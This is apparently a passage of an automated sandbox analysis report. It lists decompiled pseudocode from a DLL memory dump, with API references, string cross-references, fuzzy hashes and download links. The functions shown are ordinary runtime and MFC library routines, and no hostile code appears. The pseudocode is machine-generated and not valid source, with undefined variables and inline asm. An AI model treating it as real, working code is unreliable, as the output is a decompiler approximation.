				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E10018651(_t23, __edx, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t15 = E10018651(_t23, __edx, _t25, __eflags) + 0x90;
						 *_t15 =  *_t15 - 1;
						__eflags =  *_t15;
					}
					goto L5;
				} else {
					_t32 = _t11 - 0xe06d7363;
					if(_t11 != 0xe06d7363) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						 *(E10018651(_t23, __edx, _t25, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
						_push(8);
						_push(0x1002e6c8);
						E10013B28(_t23, _t25, __esi);
						_t19 =  *((intOrPtr*)(E10018651(_t23, __edx, _t25, _t32) + 0x78));
						if(_t19 != 0) {
							_v8 = _v8 & 0x00000000;
							 *_t19();
							_v8 = 0xfffffffe;
						}
						return E10013B6D(E1001E36A(_t23, _t24, _t25, _t26));
					}
				}
			}

0x1001c1f5
0x1001c1f5
0x1001c1ff
0x1001c206
0x1001c225
0x1001c22c
0x1001c233
0x1001c238
0x1001c238
0x1001c238
0x00000000
0x1001c208
0x1001c208
0x1001c20d
0x1001c23a
0x1001c23a
0x1001c23d
0x1001c20f
0x1001c214
0x1001cdff
0x1001ce01
0x1001ce06
0x1001ce10
0x1001ce15
0x1001ce17
0x1001ce1b
0x1001ce26
0x1001ce26
0x1001ce37
0x1001ce37
0x1001c20d

APIs

__getptd.LIBCMT ref: 1001C20F

Part of subcall function 10018651: __getptd_noexit.LIBCMT ref: 10018654
Part of subcall function 10018651: __amsg_exit.LIBCMT ref: 10018661

__getptd.LIBCMT ref: 1001C220
__getptd.LIBCMT ref: 1001C22E

Strings

MOC, xrefs: 1001C201
csm, xrefs: 1001C208

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: 52f49bb25c60bd775ff04d28df7f99700a5146c2a9846d944536f3915feca5a3
Instruction ID: aae0e21468ff2783a1fc34e13a2988e5b8a8ba135138f901888e7d2ec9e5b5ea
Opcode Fuzzy Hash: 52f49bb25c60bd775ff04d28df7f99700a5146c2a9846d944536f3915feca5a3
Instruction Fuzzy Hash: EEE0B639914648CFD710DBA4D04AF5837E5FB4A398F5604A5E44DCF222D738EAE09A92

Uniqueness

Uniqueness Score: -1.00%

Function 1000FAE4, Relevance: 7.6, APIs: 5, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000FAE4(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr _t27;
				void* _t28;
				int _t29;
				intOrPtr _t30;
				CHAR* _t32;
				intOrPtr _t33;
				signed int _t37;

				_t27 = __edx;
				_t24 = __ecx;
				_t35 = _t37;
				_t9 =  *0x10031c30; // 0x1f496801
				_v8 = _t9 ^ _t37;
				_t22 = _a4;
				_t32 = _a8;
				_push(_t28);
				_t41 = _t22;
				if(_t22 == 0) {
					L2:
					E1000572D(_t22, _t24, _t28, _t32, _t41);
				}
				if(_t32 == 0) {
					goto L2;
				}
				_t29 = lstrlenA(_t32);
				_v264 = 0;
				E10013A90(_t29,  &_v263, 0, 0xff);
				if(_t29 > 0x100 || GetWindowTextA(_t22,  &_v264, 0x100) != _t29 || lstrcmpA( &_v264, _t32) != 0) {
					_t16 = SetWindowTextA(_t22, _t32);
				}
				_pop(_t30);
				_pop(_t33);
				_pop(_t23);
				return E100127FF(_t16, _t23, _v8 ^ _t35, _t27, _t30, _t33);
			}

0x1000fae4
0x1000fae4
0x1000fae7
0x1000faef
0x1000faf6
0x1000fafa
0x1000fafe
0x1000fb01
0x1000fb02
0x1000fb04
0x1000fb06
0x1000fb06
0x1000fb06
0x1000fb0d
0x00000000
0x00000000
0x1000fb1b
0x1000fb26
0x1000fb2d
0x1000fb3c
0x1000fb65
0x1000fb65
0x1000fb6e
0x1000fb6f
0x1000fb72
0x1000fb79

APIs

lstrlenA.KERNEL32(?,?,?), ref: 1000FB10
_memset.LIBCMT ref: 1000FB2D
GetWindowTextA.USER32 ref: 1000FB47
lstrcmpA.KERNEL32(00000000,?,?,?), ref: 1000FB59
SetWindowTextA.USER32(00000000,?), ref: 1000FB65

Part of subcall function 1000572D: __CxxThrowException@8.LIBCMT ref: 10005743
Part of subcall function 1000572D: __EH_prolog3.LIBCMT ref: 10005750

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 18994cbd8d17645154f2ee9d3401ad15a038454828c3b9912cdb37c4a7175c7c
Instruction ID: d383d3c8c1f07621bb493e4ca765cb4eb6a56d86709e6628d32fe856dc1e8c8f
Opcode Fuzzy Hash: 18994cbd8d17645154f2ee9d3401ad15a038454828c3b9912cdb37c4a7175c7c
Instruction Fuzzy Hash: 8D01ADB6A00228ABE710DB64DCC5FEB77ACEF48380F100065FA4AD6141DB74DA858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10013504, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E10013504(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002e358);
				_t8 = E10013B28(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10013B6D(_t8);
				}
				if( *0x1005a4a0 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10058cc4, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E100161BE(_t31);
						 *_t10 = E1001617C(GetLastError());
					}
					goto L9;
				}
				E1001A8F1(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A924(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A954();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001355A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x10013504
0x10013506
0x1001350b
0x10013510
0x10013515
0x1001358c
0x10013591
0x10013591
0x1001351e
0x10013563
0x10013564
0x1001356c
0x10013572
0x10013574
0x10013576
0x10013589
0x1001358b
0x00000000
0x10013574
0x10013522
0x10013528
0x1001352d
0x10013533
0x10013538
0x1001353a
0x1001353b
0x1001353c
0x10013542
0x10013543
0x1001354a
0x10013553
0x00000000
0x10013555
0x10013555
0x00000000
0x10013555

APIs

__lock.LIBCMT ref: 10013522

Part of subcall function 1001A8F1: __mtinitlocknum.LIBCMT ref: 1001A907
Part of subcall function 1001A8F1: __amsg_exit.LIBCMT ref: 1001A913
Part of subcall function 1001A8F1: EnterCriticalSection.KERNEL32(00000000,00000000,?,100186FC,0000000D,1002E4E8,00000008,100187F3,00000000,?,100133E1,00000000,?,?,?,10013444), ref: 1001A91B

___sbh_find_block.LIBCMT ref: 1001352D
___sbh_free_block.LIBCMT ref: 1001353C
HeapFree.KERNEL32(00000000,00000000,1002E358,0000000C,10018642,00000000,?,1001B6B8,00000000,00000001,00000000,?,1001A87B,00000018,1002E530,0000000C), ref: 1001356C
GetLastError.KERNEL32(?,1001B6B8,00000000,00000001,00000000,?,1001A87B,00000018,1002E530,0000000C,1001A90C,00000000,00000000,?,100186FC,0000000D), ref: 1001357D

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: e96871afad8dd1e9aa3305132811eab0a86aa5ad00358b5875aaf7480820d24f
Instruction ID: 45afc794b87ce6590b7ca20e0a96f90ecd28bbea898e671da24a7cdb3cb6de9b
Opcode Fuzzy Hash: e96871afad8dd1e9aa3305132811eab0a86aa5ad00358b5875aaf7480820d24f
Instruction Fuzzy Hash: 3B01D675800712EAEF20DBB49C4A74E7BE5EF01BA0F108159F504AF092DB38EAC0CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6D8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000A6D8(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1000FD0E(0xc);
				_push(E10009AF7);
				_t26 = E10010789(__ebx, 0x10058390, __edi, _t25, _t27);
				_t28 = _t26;
				if(_t26 == 0) {
					E1000572D(__ebx, 0x10058390, __edi, _t26, _t28);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E1000FD80(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E10005B1B(_t21, 0x10058390, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x1000a6d8
0x1000a6d8
0x1000a6d8
0x1000a6e0
0x1000a6e5
0x1000a6f4
0x1000a6f6
0x1000a6f8
0x1000a6fa
0x1000a6fa
0x1000a6ff
0x1000a703
0x1000a73d
0x1000a73f
0x00000000
0x1000a705
0x1000a705
0x1000a70a
0x1000a710
0x1000a715
0x1000a721
0x1000a727
0x1000a72a
0x1000a72c
0x00000000
0x00000000
0x1000a731
0x1000a737
0x1000a737
0x00000000
0x1000a717

APIs

Part of subcall function 1000FD0E: EnterCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD48
Part of subcall function 1000FD0E: InitializeCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD5A
Part of subcall function 1000FD0E: LeaveCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD67
Part of subcall function 1000FD0E: EnterCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD77

Part of subcall function 10010789: __EH_prolog3_catch.LIBCMT ref: 10010790

Part of subcall function 1000572D: __CxxThrowException@8.LIBCMT ref: 10005743
Part of subcall function 1000572D: __EH_prolog3.LIBCMT ref: 10005750

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 1000A721
FreeLibrary.KERNEL32(?), ref: 1000A731

Strings

HtmlHelpA, xrefs: 1000A71B
hhctrl.ocx, xrefs: 1000A705

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 3bfd5515b6666aac46eb9999602b7988ba50f0f0480ac5f5d2dfe7cc6ebfd631
Instruction ID: d2e26308e1e06422b84d4846c1e0fd991668c1ca9c4283af3454b913fc4babb7
Opcode Fuzzy Hash: 3bfd5515b6666aac46eb9999602b7988ba50f0f0480ac5f5d2dfe7cc6ebfd631
Instruction Fuzzy Hash: 5501FD35404B42EBF721CBA0DC49F4A3BE1EF003D1F00C919F94E95814DB30E890AB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001C853, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001C853(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E1001C7C1(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E100135CB(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E1001C23E(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E1001C4A6(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E10013592(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x1001c853
0x1001c853
0x1001c853
0x1001c853
0x1001c853
0x1001c858
0x1001c85c
0x1001c85e
0x1001c861
0x1001c862
0x1001c863
0x1001c866
0x1001c86b
0x1001c86b
0x1001c86e
0x1001c872
0x1001c875
0x1001c87a
0x1001c877
0x1001c877
0x1001c877
0x1001c87d
0x1001c882
0x1001c884
0x1001c887
0x1001c88a
0x1001c88b
0x1001c893
0x1001c898
0x1001c89c
0x1001c89f
0x1001c8a2
0x1001c8a8
0x1001c8a9
0x1001c8ac
0x1001c8b6
0x1001c8ba
0x00000000
0x1001c8ba
0x1001c8c0

APIs

___BuildCatchObject.LIBCMT ref: 1001C866

Part of subcall function 1001C7C1: ___BuildCatchObjectHelper.LIBCMT ref: 1001C7F7

_UnwindNestedFrames.LIBCMT ref: 1001C87D
___FrameUnwindToState.LIBCMT ref: 1001C88B

Strings

csm, xrefs: 1001C862, 1001C877, 1001C88A, 1001C8A8, 1001C8B8

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 83c4627dc0c1a7624a94157f6a852912cc1468083bbef9c9f978d5df7adad282
Instruction ID: 2f359ac1a8bfa161d078c80a031d649461564440351b0c68a4b4ba1f9c615d62
Opcode Fuzzy Hash: 83c4627dc0c1a7624a94157f6a852912cc1468083bbef9c9f978d5df7adad282
Instruction Fuzzy Hash: 5B01E83500020EBBDF129E51CC45EEA7F6AEF09394F108020FD1919161DB36E9A1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001019, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001019(struct HINSTANCE__* _a4, struct HRSRC__* _a8, signed int _a12) {
				void* _t9;
				signed int _t11;
				void* _t13;
				signed int _t17;
				signed int _t20;

				_t9 = LoadResource(_a4, _a8);
				if(_t9 != 0) {
					_t20 = LockResource(_t9);
					if(_t20 == 0) {
						L7:
						_t11 = 0;
					} else {
						_t13 = SizeofResource(_a4, _a8) + _t20;
						_t17 = _a12 & 0x0000000f;
						if(_t17 <= 0) {
							L6:
							if(_t20 < _t13) {
								asm("sbb eax, eax");
								_t11 =  ~( *_t20 & 0x0000ffff) & _t20;
							} else {
								goto L7;
							}
						} else {
							while(_t20 < _t13) {
								_t17 = _t17 - 1;
								_t20 = _t20 + 2 + ( *_t20 & 0x0000ffff) * 2;
								if(_t17 != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L9;
							}
							goto L7;
						}
					}
					L9:
					return _t11;
				} else {
					return _t9;
				}
			}

0x10001022
0x1000102a
0x10001036
0x1000103a
0x10001064
0x10001064
0x1000103c
0x1000104b
0x1000104d
0x10001050
0x10001060
0x10001062
0x1000106d
0x1000106f
0x00000000
0x00000000
0x00000000
0x10001052
0x10001052
0x10001056
0x1000105a
0x1000105e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1000105e
0x00000000
0x10001052
0x10001050
0x10001071
0x10001073
0x1000102d
0x1000102d
0x1000102d

APIs

LoadResource.KERNEL32(?,?), ref: 10001022
LockResource.KERNEL32(00000000), ref: 10001030
SizeofResource.KERNEL32(?,?), ref: 10001042

Strings

pdxt@hxt0Xxt0Ixt@6|t, xrefs: 10001042

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$LoadLockSizeof
String ID: pdxt@hxt0Xxt0Ixt@6|t
API String ID: 2853612939-3308057864
Opcode ID: 1b411d4c66078951978d8d57849d07fd02a4ac064a74ec97ffc96689ac16b5ea
Instruction ID: c1b348b6cd2d90f6127f4715f2a6999df3a876a75013c7b28c1c808c0fb46a1d
Opcode Fuzzy Hash: 1b411d4c66078951978d8d57849d07fd02a4ac064a74ec97ffc96689ac16b5ea
Instruction Fuzzy Hash: 0EF067326002BAA7EF219F64DC084EA7BE5EB047E67018425FDD9D6168E771D8E09690

Uniqueness

Uniqueness Score: -1.00%

Function 1000D963, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000D963(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t12;
				CHAR* _t16;
				void* _t17;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t22;

				_t16 = _a4;
				_t20 = __ecx;
				 *(__ecx + 0x58) = _t16;
				if((_t16 & 0xffff0000) == 0) {
					_t25 =  *(__ecx + 0x54);
					if( *(__ecx + 0x54) == 0) {
						 *(__ecx + 0x54) = _t16 & 0x0000ffff;
					}
				}
				_t22 =  *(E10006DEC(_t16, _t20, _t21, _t25) + 0xc);
				_t17 = LoadResource(_t22, FindResourceA(_t22, _t16, 5));
				_t12 = E1000D924(_t20, _t17, _a8, _t22);
				FreeResource(_t17);
				return _t12;
			}

0x1000d969
0x1000d96e
0x1000d970
0x1000d979
0x1000d97b
0x1000d97f
0x1000d984
0x1000d984
0x1000d97f
0x1000d98c
0x1000d9a5
0x1000d9aa
0x1000d9b2
0x1000d9be

APIs

FindResourceA.KERNEL32(?,?,00000005), ref: 1000D993
LoadResource.KERNEL32(?,00000000), ref: 1000D99B
FreeResource.KERNEL32(00000000), ref: 1000D9B2

Strings

0Xxt0Ixt@6|t, xrefs: 1000D99B

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindFreeLoad
String ID: 0Xxt0Ixt@6|t
API String ID: 934874419-893219595
Opcode ID: 6a0030cb78a20da25d5fd1caaaf6ad0222c7ad324eda4314f99e88b0a7c7cfbc
Instruction ID: 000c479b0c47da27d58e7aef4a2d830c9f02fbea308bb579b15b5e60b92f5d79
Opcode Fuzzy Hash: 6a0030cb78a20da25d5fd1caaaf6ad0222c7ad324eda4314f99e88b0a7c7cfbc
Instruction Fuzzy Hash: C2F09072601665BFE7006BAA8C88EAAFBACFF593A5B110012F508C3210CB349C01C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 1001F57C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1001F57C() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002a068;
					_v28 =  *0x1002a060;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x1001f581
0x1001f589
0x1001f5a0
0x1001f54c
0x1001f555
0x1001f561
0x1001f564
0x1001f567
0x1001f569
0x1001f56c
0x1001f571
0x1001f57b
0x1001f573
0x1001f577
0x1001f577
0x1001f58b
0x1001f591
0x1001f599
0x00000000
0x1001f59b
0x1001f59b
0x1001f59f
0x1001f59f
0x1001f599

APIs

GetModuleHandleA.KERNEL32(KERNEL32,100169A8), ref: 1001F581
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1001F591

Strings

KERNEL32, xrefs: 1001F57C
IsProcessorFeaturePresent, xrefs: 1001F58B

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: ce3ee165891a90f82a0ad53680f2f7c425fc6da1d0c104833da8f395d54a19f0
Instruction ID: b0639626233da90f2f3280763da0ab52615984f5cb735b426ee41cf614f0c9b0
Opcode Fuzzy Hash: ce3ee165891a90f82a0ad53680f2f7c425fc6da1d0c104833da8f395d54a19f0
Instruction Fuzzy Hash: 31F03030A00919D3EB00AFA5AC497AE7AB9FB81746FE20594E695E0094DF30D1F5D256

Uniqueness

Uniqueness Score: -1.00%

Function 10021972, Relevance: 6.1, APIs: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10021972(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E100128FB( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10021233( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E100161BE(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x1002197c
